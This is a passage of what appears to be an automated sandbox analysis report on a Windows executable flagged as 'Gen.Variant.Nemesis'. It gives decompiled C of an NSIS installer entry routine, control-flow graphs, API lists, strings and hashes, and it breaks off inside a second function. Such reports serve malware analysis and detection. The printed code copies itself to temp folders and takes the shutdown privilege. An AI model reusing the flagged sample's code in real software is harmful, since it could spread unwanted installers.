40391c-403932 call 40653d * 2 89->107 105 40396a-403984 lstrcatW lstrcmpiW 90->105 106 40395f-403965 lstrcatW 90->106 103 403ae8-403af3 ExitWindowsEx 92->103 104 403adc-403ae6 92->104 93->92 94->95 99 4038f7 94->99 95->86 95->99 99->81 103->85 108 403af5-403af7 call 40140b 103->108 104->103 104->108 109 403a57 105->109 110 40398a-40398d 105->110 106->105 107->72 108->85 109->67 114 403996 call 405aeb 110->114 115 40398f-403994 call 405a6e 110->115 121 40399b-4039ab SetCurrentDirectoryW 114->121 115->121 123 4039b8-4039e4 call 40653d 121->123 124 4039ad-4039b3 call 40653d 121->124 128 4039e9-403a04 call 40657a DeleteFileW 123->128 124->123 131 403a44-403a4e 128->131 132 403a06-403a16 CopyFileW 128->132 131->128 133 403a50-403a52 call 4062fd 131->133 132->131 134 403a18-403a38 call 4062fd call 40657a call 405b20 132->134 133->109 134->131 142 403a3a-403a41 CloseHandle 134->142 142->131
                                  C-Code - Quality: 79%
                                  			_entry_() {
                                  				WCHAR* _v8;
                                  				signed int _v12;
                                  				void* _v16;
                                  				signed int _v20;
                                  				int _v24;
                                  				int _v28;
                                  				struct _TOKEN_PRIVILEGES _v40;
                                  				signed char _v42;
                                  				int _v44;
                                  				signed int _v48;
                                  				intOrPtr _v278;
                                  				signed short _v310;
                                  				struct _OSVERSIONINFOW _v324;
                                  				struct _SHFILEINFOW _v1016;
                                  				intOrPtr* _t88;
                                  				WCHAR* _t92;
                                  				char* _t94;
                                  				void _t97;
                                  				void* _t116;
                                  				WCHAR* _t118;
                                  				signed int _t120;
                                  				intOrPtr* _t124;
                                  				void* _t138;
                                  				void* _t144;
                                  				void* _t149;
                                  				void* _t153;
                                  				void* _t158;
                                  				signed int _t168;
                                  				void* _t171;
                                  				void* _t176;
                                  				intOrPtr _t178;
                                  				intOrPtr _t179;
                                  				intOrPtr* _t180;
                                  				int _t189;
                                  				void* _t190;
                                  				void* _t199;
                                  				signed int _t205;
                                  				signed int _t210;
                                  				signed int _t215;
                                  				signed int _t217;
                                  				int* _t219;
                                  				signed int _t227;
                                  				signed int _t230;
                                  				CHAR* _t232;
                                  				char* _t233;
                                  				signed int _t234;
                                  				WCHAR* _t235;
                                  				void* _t251;
                                  
                                  				_t217 = 0x20;
                                  				_t189 = 0;
                                  				_v24 = 0;
                                  				_v8 = L"Error writing temporary file. Make sure your temp folder is valid.";
                                  				_v20 = 0;
                                  				SetErrorMode(0x8001); // executed
                                  				_v324.szCSDVersion = 0;
                                  				_v48 = 0;
                                  				_v44 = 0;
                                  				_v324.dwOSVersionInfoSize = 0x11c;
                                  				if(GetVersionExW( &_v324) == 0) {
                                  					_v324.dwOSVersionInfoSize = 0x114;
                                  					GetVersionExW( &_v324);
                                  					asm("sbb eax, eax");
                                  					_v42 = 4;
                                  					_v48 =  !( ~(_v324.szCSDVersion - 0x53)) & _v278 + 0xffffffd0;
                                  				}
                                  				if(_v324.dwMajorVersion < 0xa) {
                                  					_v310 = _v310 & 0x00000000;
                                  				}
                                  				 *0x434fb8 = _v324.dwBuildNumber;
                                  				 *0x434fbc = (_v324.dwMajorVersion & 0x0000ffff | _v324.dwMinorVersion & 0x000000ff) << 0x00000010 | _v48 & 0x0000ffff | _v42 & 0x000000ff;
                                  				if( *0x434fbe != 0x600) {
                                  					_t180 = E0040690A(_t189);
                                  					if(_t180 != _t189) {
                                  						 *_t180(0xc00);
                                  					}
                                  				}
                                  				_t232 = "UXTHEME";
                                  				do {
                                  					E0040689A(_t232); // executed
                                  					_t232 =  &(_t232[lstrlenA(_t232) + 1]);
                                  				} while ( *_t232 != 0);
                                  				E0040690A(0xb);
                                  				 *0x434f04 = E0040690A(9);
                                  				_t88 = E0040690A(7);
                                  				if(_t88 != _t189) {
                                  					_t88 =  *_t88(0x1e);
                                  					if(_t88 != 0) {
                                  						 *0x434fbc =  *0x434fbc | 0x00000080;
                                  					}
                                  				}
                                  				__imp__#17();
                                  				__imp__OleInitialize(_t189); // executed
                                  				 *0x434fc0 = _t88;
                                  				SHGetFileInfoW(0x42b228, _t189,  &_v1016, 0x2b4, _t189); // executed
                                  				E0040653D(0x433f00, L"NSIS Error");
                                  				_t92 = GetCommandLineW();
                                  				_t233 = L"\"C:\\Users\\jones\\Desktop\\SecuriteInfo.com.Gen.Variant.Nemesis.7222.26141.exe\" ";
                                  				E0040653D(_t233, _t92);
                                  				_t94 = _t233;
                                  				_t234 = 0x22;
                                  				 *0x434f00 = 0x400000;
                                  				_t251 = L"\"C:\\Users\\jones\\Desktop\\SecuriteInfo.com.Gen.Variant.Nemesis.7222.26141.exe\" " - _t234; // 0x22
                                  				if(_t251 == 0) {
                                  					_t217 = _t234;
                                  					_t94 =  &M00440002;
                                  				}
                                  				_t199 = CharNextW(E00405E39(_t94, _t217));
                                  				_v16 = _t199;
                                  				while(1) {
                                  					_t97 =  *_t199;
                                  					_t252 = _t97 - _t189;
                                  					if(_t97 == _t189) {
                                  						break;
                                  					}
                                  					_t210 = 0x20;
                                  					__eflags = _t97 - _t210;
                                  					if(_t97 != _t210) {
                                  						L17:
                                  						__eflags =  *_t199 - _t234;
                                  						_v12 = _t210;
                                  						if( *_t199 == _t234) {
                                  							_v12 = _t234;
                                  							_t199 = _t199 + 2;
                                  							__eflags = _t199;
                                  						}
                                  						__eflags =  *_t199 - 0x2f;
                                  						if( *_t199 != 0x2f) {
                                  							L32:
                                  							_t199 = E00405E39(_t199, _v12);
                                  							__eflags =  *_t199 - _t234;
                                  							if(__eflags == 0) {
                                  								_t199 = _t199 + 2;
                                  								__eflags = _t199;
                                  							}
                                  							continue;
                                  						} else {
                                  							_t199 = _t199 + 2;
                                  							__eflags =  *_t199 - 0x53;
                                  							if( *_t199 != 0x53) {
                                  								L24:
                                  								asm("cdq");
                                  								asm("cdq");
                                  								_t215 = L"NCRC" & 0x0000ffff;
                                  								asm("cdq");
                                  								_t227 = ( *0x40a2c2 & 0x0000ffff) << 0x00000010 |  *0x40a2c0 & 0x0000ffff | _t215;
                                  								__eflags =  *_t199 - (( *0x40a2be & 0x0000ffff) << 0x00000010 | _t215);
                                  								if( *_t199 != (( *0x40a2be & 0x0000ffff) << 0x00000010 | _t215)) {
                                  									L29:
                                  									asm("cdq");
                                  									asm("cdq");
                                  									_t210 = L" /D=" & 0x0000ffff;
                                  									asm("cdq");
                                  									_t230 = ( *0x40a2b6 & 0x0000ffff) << 0x00000010 |  *0x40a2b4 & 0x0000ffff | _t210;
                                  									__eflags =  *(_t199 - 4) - (( *0x40a2b2 & 0x0000ffff) << 0x00000010 | _t210);
                                  									if( *(_t199 - 4) != (( *0x40a2b2 & 0x0000ffff) << 0x00000010 | _t210)) {
                                  										L31:
                                  										_t234 = 0x22;
                                  										goto L32;
                                  									}
                                  									__eflags =  *_t199 - _t230;
                                  									if( *_t199 == _t230) {
                                  										 *(_t199 - 4) = _t189;
                                  										__eflags = _t199;
                                  										E0040653D(L"C:\\Users\\jones\\AppData\\Local\\Temp", _t199);
                                  										L37:
                                  										_t235 = L"C:\\Users\\jones\\AppData\\Local\\Temp\\";
                                  										GetTempPathW(0x400, _t235);
                                  										_t116 = E004034FC(_t199, _t252);
                                  										_t253 = _t116;
                                  										if(_t116 != 0) {
                                  											L40:
                                  											DeleteFileW(L"1033"); // executed
                                  											_t118 = E0040307D(_t255, _v20); // executed
                                  											_v8 = _t118;
                                  											if(_t118 != _t189) {
                                  												L68:
                                  												E00403B12();
                                  												__imp__OleUninitialize();
                                  												if(_v8 == _t189) {
                                  													if( *0x434f94 == _t189) {
                                  														L77:
                                  														_t120 =  *0x434fac;
                                  														if(_t120 != 0xffffffff) {
                                  															_v24 = _t120;
                                  														}
                                  														ExitProcess(_v24);
                                  													}
                                  													if(OpenProcessToken(GetCurrentProcess(), 0x28,  &_v16) != 0) {
                                  														LookupPrivilegeValueW(_t189, L"SeShutdownPrivilege",  &(_v40.Privileges));
                                  														_v40.PrivilegeCount = 1;
                                  														_v28 = 2;
                                  														AdjustTokenPrivileges(_v16, _t189,  &_v40, _t189, _t189, _t189);
                                  													}
                                  													_t124 = E0040690A(4);
                                  													if(_t124 == _t189) {
                                  														L75:
                                  														if(ExitWindowsEx(2, 0x80040002) != 0) {
                                  															goto L77;
                                  														}
                                  														goto L76;
                                  													} else {
                                  														_push(0x80040002);
                                  														_push(0x25);
                                  														_push(_t189);
                                  														_push(_t189);
                                  														_push(_t189);
                                  														if( *_t124() == 0) {
                                  															L76:
                                  															E0040140B(9);
                                  															goto L77;
                                  														}
                                  														goto L75;
                                  													}
                                  												}
                                  												E00405B9D(_v8, 0x200010);
                                  												ExitProcess(2);
                                  											}
                                  											if( *0x434f1c == _t189) {
                                  												L51:
                                  												 *0x434fac =  *0x434fac | 0xffffffff;
                                  												_v24 = E00403BEC(_t265);
                                  												goto L68;
                                  											}
                                  											_t219 = E00405E39(L"\"C:\\Users\\jones\\Desktop\\SecuriteInfo.com.Gen.Variant.Nemesis.7222.26141.exe\" ", _t189);
                                  											if(_t219 < L"\"C:\\Users\\jones\\Desktop\\SecuriteInfo.com.Gen.Variant.Nemesis.7222.26141.exe\" ") {
                                  												L48:
                                  												_t264 = _t219 - L"\"C:\\Users\\jones\\Desktop\\SecuriteInfo.com.Gen.Variant.Nemesis.7222.26141.exe\" ";
                                  												_v8 = L"Error launching installer";
                                  												if(_t219 < L"\"C:\\Users\\jones\\Desktop\\SecuriteInfo.com.Gen.Variant.Nemesis.7222.26141.exe\" ") {
                                  													_t190 = E00405B08(__eflags);
                                  													lstrcatW(_t235, L"~nsu");
                                  													__eflags = _t190;
                                  													if(_t190 != 0) {
                                  														lstrcatW(_t235, "A");
                                  													}
                                  													lstrcatW(_t235, L".tmp");
                                  													_t220 = L"C:\\Users\\jones\\Desktop";
                                  													_t138 = lstrcmpiW(_t235, L"C:\\Users\\jones\\Desktop");
                                  													__eflags = _t138;
                                  													if(_t138 == 0) {
                                  														L67:
                                  														_t189 = 0;
                                  														__eflags = 0;
                                  														goto L68;
                                  													} else {
                                  														__eflags = _t190;
                                  														_push(_t235);
                                  														if(_t190 == 0) {
                                  															E00405AEB();
                                  														} else {
                                  															E00405A6E();
                                  														}
                                  														SetCurrentDirectoryW(_t235);
                                  														__eflags = L"C:\\Users\\jones\\AppData\\Local\\Temp"; // 0x43
                                  														if(__eflags == 0) {
                                  															E0040653D(L"C:\\Users\\jones\\AppData\\Local\\Temp", _t220);
                                  														}
                                  														E0040653D(0x436000, _v16);
                                  														_t202 = "A" & 0x0000ffff;
                                  														_t144 = ( *0x40a25a & 0x0000ffff) << 0x00000010 | "A" & 0x0000ffff;
                                  														__eflags = _t144;
                                  														_v12 = 0x1a;
                                  														 *0x436800 = _t144;
                                  														do {
                                  															E0040657A(0, 0x42aa28, _t235, 0x42aa28,  *((intOrPtr*)( *0x434f10 + 0x120)));
                                  															DeleteFileW(0x42aa28);
                                  															__eflags = _v8;
                                  															if(_v8 != 0) {
                                  																_t149 = CopyFileW(L"C:\\Users\\jones\\Desktop\\SecuriteInfo.com.Gen.Variant.Nemesis.7222.26141.exe", 0x42aa28, 1);
                                  																__eflags = _t149;
                                  																if(_t149 != 0) {
                                  																	E004062FD(_t202, 0x42aa28, 0);
                                  																	E0040657A(0, 0x42aa28, _t235, 0x42aa28,  *((intOrPtr*)( *0x434f10 + 0x124)));
                                  																	_t153 = E00405B20(0x42aa28);
                                  																	__eflags = _t153;
                                  																	if(_t153 != 0) {
                                  																		CloseHandle(_t153);
                                  																		_v8 = 0;
                                  																	}
                                  																}
                                  															}
                                  															 *0x436800 =  *0x436800 + 1;
                                  															_t61 =  &_v12;
                                  															 *_t61 = _v12 - 1;
                                  															__eflags =  *_t61;
                                  														} while ( *_t61 != 0);
                                  														E004062FD(_t202, _t235, 0);
                                  														goto L67;
                                  													}
                                  												}
                                  												 *_t219 = _t189;
                                  												_t222 =  &(_t219[2]);
                                  												_t158 = E00405F14(_t264,  &(_t219[2]));
                                  												_t265 = _t158;
                                  												if(_t158 == 0) {
                                  													goto L68;
                                  												}
                                  												E0040653D(L"C:\\Users\\jones\\AppData\\Local\\Temp", _t222);
                                  												E0040653D(L"C:\\Users\\jones\\AppData\\Local\\Temp", _t222);
                                  												_v8 = _t189;
                                  												goto L51;
                                  											}
                                  											asm("cdq");
                                  											asm("cdq");
                                  											asm("cdq");
                                  											_t205 = ( *0x40a27e & 0x0000ffff) << 0x00000010 | L" _?=" & 0x0000ffff;
                                  											_t168 = ( *0x40a282 & 0x0000ffff) << 0x00000010 |  *0x40a280 & 0x0000ffff | (_t210 << 0x00000020 |  *0x40a282 & 0x0000ffff) << 0x10;
                                  											while( *_t219 != _t205 || _t219[1] != _t168) {
                                  												_t219 = _t219;
                                  												if(_t219 >= L"\"C:\\Users\\jones\\Desktop\\SecuriteInfo.com.Gen.Variant.Nemesis.7222.26141.exe\" ") {
                                  													continue;
                                  												}
                                  												break;
                                  											}
                                  											_t189 = 0;
                                  											goto L48;
                                  										}
                                  										GetWindowsDirectoryW(_t235, 0x3fb);
                                  										lstrcatW(_t235, L"\\Temp");
                                  										_t171 = E004034FC(_t199, _t253);
                                  										_t254 = _t171;
                                  										if(_t171 != 0) {
                                  											goto L40;
                                  										}
                                  										GetTempPathW(0x3fc, _t235);
                                  										lstrcatW(_t235, L"Low");
                                  										SetEnvironmentVariableW(L"TEMP", _t235);
                                  										SetEnvironmentVariableW(L"TMP", _t235);
                                  										_t176 = E004034FC(_t199, _t254);
                                  										_t255 = _t176;
                                  										if(_t176 == 0) {
                                  											goto L68;
                                  										}
                                  										goto L40;
                                  									}
                                  									goto L31;
                                  								}
                                  								__eflags =  *((intOrPtr*)(_t199 + 4)) - _t227;
                                  								if( *((intOrPtr*)(_t199 + 4)) != _t227) {
                                  									goto L29;
                                  								}
                                  								_t178 =  *((intOrPtr*)(_t199 + 8));
                                  								__eflags = _t178 - 0x20;
                                  								if(_t178 == 0x20) {
                                  									L28:
                                  									_t36 =  &_v20;
                                  									 *_t36 = _v20 | 0x00000004;
                                  									__eflags =  *_t36;
                                  									goto L29;
                                  								}
                                  								__eflags = _t178 - _t189;
                                  								if(_t178 != _t189) {
                                  									goto L29;
                                  								}
                                  								goto L28;
                                  							}
                                  							_t179 =  *((intOrPtr*)(_t199 + 2));
                                  							__eflags = _t179 - _t210;
                                  							if(_t179 == _t210) {
                                  								L23:
                                  								 *0x434fa0 = 1;
                                  								goto L24;
                                  							}
                                  							__eflags = _t179 - _t189;
                                  							if(_t179 != _t189) {
                                  								goto L24;
                                  							}
                                  							goto L23;
                                  						}
                                  					} else {
                                  						goto L16;
                                  					}
                                  					do {
                                  						L16:
                                  						_t199 = _t199 + 2;
                                  						__eflags =  *_t199 - _t210;
                                  					} while ( *_t199 == _t210);
                                  					goto L17;
                                  				}
                                  				goto L37;
                                  			}



















































                                  0x0040353b
                                  0x0040353c
                                  0x00403543
                                  0x00403546
                                  0x0040354d
                                  0x00403550
                                  0x00403563
                                  0x00403569
                                  0x0040356c
                                  0x0040356f
                                  0x0040357d
                                  0x00403585
                                  0x00403590
                                  0x004035a9
                                  0x004035ab
                                  0x004035b3
                                  0x004035b3
                                  0x004035be
                                  0x004035c0
                                  0x004035c0
                                  0x004035d5
                                  0x004035fa
                                  0x00403608
                                  0x0040360b
                                  0x00403612
                                  0x00403619
                                  0x00403619
                                  0x00403612
                                  0x0040361b
                                  0x00403620
                                  0x00403621
                                  0x0040362d
                                  0x00403631
                                  0x00403638
                                  0x00403646
                                  0x0040364b
                                  0x00403652
                                  0x00403656
                                  0x0040365a
                                  0x0040365c
                                  0x0040365c
                                  0x0040365a
                                  0x00403663
                                  0x0040366a
                                  0x00403670
                                  0x00403688
                                  0x00403698
                                  0x0040369d
                                  0x004036a3
                                  0x004036aa
                                  0x004036b1
                                  0x004036b3
                                  0x004036b4
                                  0x004036be
                                  0x004036c5
                                  0x004036c7
                                  0x004036c9
                                  0x004036c9
                                  0x004036dc
                                  0x004036de
                                  0x004037d8
                                  0x004037d8
                                  0x004037db
                                  0x004037de
                                  0x00000000
                                  0x00000000
                                  0x004036e8
                                  0x004036e9
                                  0x004036ec
                                  0x004036f5
                                  0x004036f5
                                  0x004036f8
                                  0x004036fb
                                  0x004036fe
                                  0x00403701
                                  0x00403701
                                  0x00403701
                                  0x00403702
                                  0x00403706
                                  0x004037c6
                                  0x004037cf
                                  0x004037d1
                                  0x004037d4
                                  0x004037d7
                                  0x004037d7
                                  0x004037d7
                                  0x00000000
                                  0x0040370c
                                  0x0040370d
                                  0x0040370e
                                  0x00403712
                                  0x0040372c
                                  0x00403733
                                  0x00403746
                                  0x00403747
                                  0x0040375c
                                  0x00403761
                                  0x00403763
                                  0x00403765
                                  0x00403781
                                  0x00403788
                                  0x0040379b
                                  0x0040379c
                                  0x004037b1
                                  0x004037b7
                                  0x004037b9
                                  0x004037bb
                                  0x004037c3
                                  0x004037c5
                                  0x00000000
                                  0x004037c5
                                  0x004037bf
                                  0x004037c1
                                  0x004037e6
                                  0x004037ea
                                  0x004037f3
                                  0x004037f8
                                  0x004037fe
                                  0x00403809
                                  0x0040380b
                                  0x00403810
                                  0x00403812
                                  0x0040386a
                                  0x0040386f
                                  0x00403878
                                  0x0040387f
                                  0x00403882
                                  0x00403a59
                                  0x00403a59
                                  0x00403a5e
                                  0x00403a67
                                  0x00403a84
                                  0x00403afc
                                  0x00403afc
                                  0x00403b04
                                  0x00403b06
                                  0x00403b06
                                  0x00403b0c
                                  0x00403b0c
                                  0x00403a9b
                                  0x00403aa7
                                  0x00403ab8
                                  0x00403abf
                                  0x00403ac6
                                  0x00403ac6
                                  0x00403ace
                                  0x00403ada
                                  0x00403ae8
                                  0x00403af3
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00403adc
                                  0x00403adc
                                  0x00403add
                                  0x00403adf
                                  0x00403ae0
                                  0x00403ae1
                                  0x00403ae6
                                  0x00403af5
                                  0x00403af7
                                  0x00000000
                                  0x00403af7
                                  0x00000000
                                  0x00403ae6
                                  0x00403ada
                                  0x00403a71
                                  0x00403a78
                                  0x00403a78
                                  0x0040388e
                                  0x00403935
                                  0x00403935
                                  0x00403941
                                  0x00000000
                                  0x00403941
                                  0x0040389f
                                  0x004038a7
                                  0x004038f9
                                  0x004038f9
                                  0x004038ff
                                  0x00403906
                                  0x00403954
                                  0x00403956
                                  0x0040395b
                                  0x0040395d
                                  0x00403965
                                  0x00403965
                                  0x00403970
                                  0x00403975
                                  0x0040397c
                                  0x00403982
                                  0x00403984
                                  0x00403a57
                                  0x00403a57
                                  0x00403a57
                                  0x00000000
                                  0x0040398a
                                  0x0040398a
                                  0x0040398c
                                  0x0040398d
                                  0x00403996
                                  0x0040398f
                                  0x0040398f
                                  0x0040398f
                                  0x0040399c
                                  0x004039a4
                                  0x004039ab
                                  0x004039b3
                                  0x004039b3
                                  0x004039c0
                                  0x004039cc
                                  0x004039d6
                                  0x004039d6
                                  0x004039d8
                                  0x004039df
                                  0x004039e9
                                  0x004039f5
                                  0x004039fb
                                  0x00403a01
                                  0x00403a04
                                  0x00403a0e
                                  0x00403a14
                                  0x00403a16
                                  0x00403a1a
                                  0x00403a2b
                                  0x00403a31
                                  0x00403a36
                                  0x00403a38
                                  0x00403a3b
                                  0x00403a41
                                  0x00403a41
                                  0x00403a38
                                  0x00403a16
                                  0x00403a44
                                  0x00403a4b
                                  0x00403a4b
                                  0x00403a4b
                                  0x00403a4b
                                  0x00403a52
                                  0x00000000
                                  0x00403a52
                                  0x00403984
                                  0x00403908
                                  0x0040390b
                                  0x0040390f
                                  0x00403914
                                  0x00403916
                                  0x00000000
                                  0x00000000
                                  0x00403922
                                  0x0040392d
                                  0x00403932
                                  0x00000000
                                  0x00403932
                                  0x004038b0
                                  0x004038c8
                                  0x004038d9
                                  0x004038da
                                  0x004038de
                                  0x004038e0
                                  0x004038ee
                                  0x004038f5
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x004038f5
                                  0x004038f7
                                  0x00000000
                                  0x004038f7
                                  0x0040381a
                                  0x00403826
                                  0x0040382b
                                  0x00403830
                                  0x00403832
                                  0x00000000
                                  0x00000000
                                  0x0040383a
                                  0x00403842
                                  0x00403853
                                  0x0040385b
                                  0x0040385d
                                  0x00403862
                                  0x00403864
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00403864
                                  0x00000000
                                  0x004037c1
                                  0x0040376a
                                  0x0040376c
                                  0x00000000
                                  0x00000000
                                  0x0040376e
                                  0x00403772
                                  0x00403776
                                  0x0040377d
                                  0x0040377d
                                  0x0040377d
                                  0x0040377d
                                  0x00000000
                                  0x0040377d
                                  0x00403778
                                  0x0040377b
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0040377b
                                  0x00403714
                                  0x00403718
                                  0x0040371b
                                  0x00403722
                                  0x00403722
                                  0x00000000
                                  0x00403722
                                  0x0040371d
                                  0x00403720
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00403720
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x004036ee
                                  0x004036ee
                                  0x004036ef
                                  0x004036f0
                                  0x004036f0
                                  0x00000000
                                  0x004036ee
                                  0x00000000

                                  APIs
                                  • SetErrorMode.KERNELBASE(00008001), ref: 00403550
                                  • GetVersionExW.KERNEL32(?), ref: 00403579
                                  • GetVersionExW.KERNEL32(0000011C), ref: 00403590
                                  • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 00403627
                                  • #17.COMCTL32(00000007,00000009,0000000B), ref: 00403663
                                  • OleInitialize.OLE32(00000000), ref: 0040366A
                                  • SHGetFileInfoW.SHELL32(0042B228,00000000,?,000002B4,00000000), ref: 00403688
                                  • GetCommandLineW.KERNEL32(00433F00,NSIS Error), ref: 0040369D
                                  • CharNextW.USER32(00000000,"C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.7222.26141.exe" ,00000020,"C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.7222.26141.exe" ,00000000), ref: 004036D6
                                  • GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,?), ref: 00403809
                                  • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 0040381A
                                  • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 00403826
                                  • GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp), ref: 0040383A
                                  • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 00403842
                                  • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low), ref: 00403853
                                  • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\), ref: 0040385B
                                  • DeleteFileW.KERNELBASE(1033), ref: 0040386F
                                  • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu), ref: 00403956
                                  • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,0040A26C), ref: 00403965
                                    • Part of subcall function 00405AEB: CreateDirectoryW.KERNELBASE(?,00000000,00403520,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 00405AF1
                                  • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp), ref: 00403970
                                  • lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.7222.26141.exe" ,00000000,?), ref: 0040397C
                                  • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\), ref: 0040399C
                                  • DeleteFileW.KERNEL32(0042AA28,0042AA28,?,00436000,?), ref: 004039FB
                                  • CopyFileW.KERNEL32(C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.7222.26141.exe,0042AA28,00000001), ref: 00403A0E
                                  • CloseHandle.KERNEL32(00000000,0042AA28,0042AA28,?,0042AA28,00000000), ref: 00403A3B
                                  • OleUninitialize.OLE32(?), ref: 00403A5E
                                  • ExitProcess.KERNEL32 ref: 00403A78
                                  • GetCurrentProcess.KERNEL32(00000028,?), ref: 00403A8C
                                  • OpenProcessToken.ADVAPI32(00000000), ref: 00403A93
                                  • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403AA7
                                  • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00403AC6
                                  • ExitWindowsEx.USER32 ref: 00403AEB
                                  • ExitProcess.KERNEL32 ref: 00403B0C
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.777947969.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.777940223.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.777964906.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.777971054.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.777977082.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.778005953.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.778015938.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.778022993.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.778039326.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.778046146.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                  Similarity
                                  • API ID: lstrcat$FileProcess$DirectoryExit$CurrentDeleteEnvironmentPathTempTokenVariableVersionWindows$AdjustCharCloseCommandCopyCreateErrorHandleInfoInitializeLineLookupModeNextOpenPrivilegePrivilegesUninitializeValuelstrcmpilstrlen
                                  • String ID: "C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.7222.26141.exe" $.tmp$1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.7222.26141.exe$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
                                  • API String ID: 3859024572-2797113306
                                  • Opcode ID: 7a788a85b9786d5a7ebd132106c546d121407ab0fc20c65c93ef4011eb75cbdd
                                  • Instruction ID: 4d4dc0a58e4858e72561def8a0259f0227da8af974c10a5ea2b310ef4b80d7a5
                                  • Opcode Fuzzy Hash: 7a788a85b9786d5a7ebd132106c546d121407ab0fc20c65c93ef4011eb75cbdd
                                  • Instruction Fuzzy Hash: 66E10670A00214AADB10AFB59D45BAF3AB8EF4470AF14847FF545B22D1DB7C8A41CB6D
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 143 4056de-4056f9 144 405888-40588f 143->144 145 4056ff-4057c6 GetDlgItem * 3 call 4044ce call 404e27 GetClientRect GetSystemMetrics SendMessageW * 2 143->145 147 405891-4058b3 GetDlgItem CreateThread FindCloseChangeNotification 144->147 148 4058b9-4058c6 144->148 163 4057e4-4057e7 145->163 164 4057c8-4057e2 SendMessageW * 2 145->164 147->148 150 4058e4-4058ee 148->150 151 4058c8-4058ce 148->151 155 4058f0-4058f6 150->155 156 405944-405948 150->156 153 4058d0-4058df ShowWindow * 2 call 4044ce 151->153 154 405909-405912 call 404500 151->154 153->150 167 405917-40591b 154->167 160 4058f8-405904 call 404472 155->160 161 40591e-40592e ShowWindow 155->161 156->154 158 40594a-405950 156->158 158->154 165 405952-405965 SendMessageW 158->165 160->154 168 405930-405939 call 40559f 161->168 169 40593e-40593f call 404472 161->169 172 4057f7-40580e call 404499 163->172 173 4057e9-4057f5 SendMessageW 163->173 164->163 174 405a67-405a69 165->174 175 40596b-405996 CreatePopupMenu call 40657a AppendMenuW 165->175 168->169 169->156 182 405810-405824 ShowWindow 172->182 183 405844-405865 GetDlgItem SendMessageW 172->183 173->172 174->167 180 405998-4059a8 GetWindowRect 175->180 181 4059ab-4059c0 TrackPopupMenu 175->181 180->181 181->174 185 4059c6-4059dd 181->185 186 405833 182->186 187 405826-405831 ShowWindow 182->187 183->174 184 40586b-405883 SendMessageW * 2 183->184 184->174 188 4059e2-4059fd SendMessageW 185->188 189 405839-40583f call 4044ce 186->189 187->189 188->188 190 4059ff-405a22 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 188->190 189->183 192 405a24-405a4b SendMessageW 190->192 192->192 193 405a4d-405a61 GlobalUnlock SetClipboardData CloseClipboard 192->193 193->174
                                  C-Code - Quality: 96%
                                  			E004056DE(struct HWND__* _a4, long _a8, long _a12, unsigned int _a16) {
                                  				struct HWND__* _v8;
                                  				long _v12;
                                  				struct tagRECT _v28;
                                  				void* _v36;
                                  				signed int _v40;
                                  				int _v44;
                                  				int _v48;
                                  				signed int _v52;
